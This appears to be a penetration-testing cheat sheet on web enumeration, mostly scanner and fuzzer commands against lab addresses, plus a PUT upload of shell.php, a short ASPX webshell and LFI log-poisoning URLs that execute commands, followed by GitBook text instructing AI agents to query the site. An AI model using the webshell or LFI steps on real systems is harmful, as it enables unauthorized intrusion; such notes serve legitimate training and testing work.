> For the complete documentation index, see [llms.txt](https://ed4m4s.blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ed4m4s.blog/master-1/http-enum.md). # HTTP Enum #### ***`The main thing to remember here is to always run against multiple wordlists starting with directory-list-2.3-medium.txt`*** ### Gobuster ``` # URL Search -- Quick Directory Busting: gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux -- Comprehensive Directory Busting gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -- Search with File Extension gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php ========================================================================================================================================================================================== # DNS Search gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt ========================================================================================================================================================================================== # vhost Search gobuster vhost -u https://anysite.com -w common-vhosts.txt ``` ### FFUF ``` ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" ``` ### **Nikto Web Scan** ``` nikto -h 10.10.10.10 nikto -h 10.10.10.10 -p 8080 # Different port nikto -h 10.10.10.10 -p 443,80,8080,8081 # Multiple ports nikto -h 10.10.10.10 -p 80-88 # Port range ``` ### Wordpress Scan ``` wpscan --update wpscan --url http://10.10.10.10/ wpscan --url http://10.10.10.10/wp/ wpscan -u 10.10.10.10/wp/ --enumerate [p/vp/ap/t/vt/at] **** User **** u: enumerate users **** Plugins Switches **** p: Popular plugins only vp: Vulnerable plugins only ap: All plugins **** Themes Switches **** t: Popular themes only vt: Vulnerable plugins only at: All themes ``` ### Drupal ``` droopescan scan drupal -u http://10.10.10.10/ -t 32 ``` ### Joomla ``` joomscan -u http://10.10.10.10/ ``` ### Dirb ``` dirb http://10.10.10.x ******** HOTKEYS ******* n -> Go to the next directory. q -> Stop scan and save current state. r -> Remaining scan stats dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt -x : use this extension list against the wordlists within big.txt ``` ### Dirsearch ``` git clone https://github.com/maurosoria/dirsearch.git cd dirsearch python3 dirsearch.py -u -e Example python3 dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ./dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u: URL to scan. -e: formats to search. -w: wordlist. ``` ### Netcat ``` nc 10.10.10.10 80 HEAD / HTTP/1.0 GET / HTTP/1.0 ``` ### cUrl ``` # Header curl -i INSERTIPADDRESS # Everything else curl -i -L INSERTIPADDRESS # Title and all links curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' # Just text curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq # Upload possible? curl -v -X OPTIONS http://INSERTIPADDRESS/ curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php ``` ### Wfuzz ``` ----Simple Test---- wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php ----URL testing---- wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ ----DNS fuzzing---- wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1 wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62 ``` ### **Upload a PHP file** ``` In case you can upload a file try the below. This can be used for reverse shell too. OR ``` ### WebDav ``` davtest -url http://10.10.10.10 <-- Make a test to see file extensions upload. cadaver http://10.10.10.10/ <-- Connect ``` ### ASPx Webshell ``` <% Set rs = CreateObject("WScript.Shell") Set cmd = rs.Exec("cmd /c whoami") o = cmdStdOut.Readall() Response.write(o) %> ``` ### Code Execution through HTTP/LFI ``` nc 10.10.10.10 ========================================================================== After this and on the LFI you have discovered just place the variable cmd: ?cmd=id &cmd=id http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami ``` ### --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://ed4m4s.blog/master-1/http-enum.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.